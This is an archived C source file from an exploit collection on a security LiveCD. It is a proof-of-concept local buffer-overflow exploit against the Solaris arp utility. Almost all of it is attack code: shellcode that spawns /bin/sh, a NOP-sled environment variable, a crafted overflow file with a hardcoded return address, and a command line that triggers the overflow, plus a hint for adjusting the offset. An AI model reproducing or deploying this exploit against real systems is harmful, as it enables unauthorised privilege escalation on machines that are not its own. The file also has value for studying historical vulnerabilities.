home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / arpexp.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  1KB  |  53 lines

---

1. /*
2.    arp overflow proof of concept by ahmed@securityfocus.com
3.    shellcode originally written by Cheez Whiz.
4.  
5.                               tested on x86 solaris 7,8beta
6.    default should work.  if not, arg1 = offset. +- by 100's
7.  
8.    Copyright Security-Focus.com, 11/2000
9. */
10.  
11. long get_esp() { __asm__("movl %esp,%eax"); }
12.  
13. int main(int ac, char **av)
14. {
15.   char shell[] =
16.     "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
17.     "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
18.     "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
19.     "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
20.     "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
21.     "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
22.     "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
23.     "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
24.     "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
25.     "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
26.     "\xff\xff";
27.  
28.   unsigned long magic = 0x8047b78;
29.   unsigned long r = get_esp() + 600;
30.   unsigned char buf[300];
31.   int f;
32.  
33.   if (ac == 2)
34.     r += atoi(av[1]);
35.  
36.   memset(buf,0x61,sizeof(buf));
37.   memcpy(buf+52,&magic,4);
38.   memcpy(buf+76,&r,4);
39.  
40.   f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
41.   write(f,"1 2 3 4 ",8);
42.   write(f,buf,sizeof(buf));
43.   close(f);
44.  
45.   memset(buf,0x90,sizeof(buf));
46.   memcpy(buf,"LOL=",4);
47.   memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
48.   putenv(buf);
49.  
50.   system("/usr/sbin/arp -f /tmp/ypx");
51.   unlink("/tmp/ypx");
52. }
53. /*                   www.hack.co.za  [15 January 2001]*/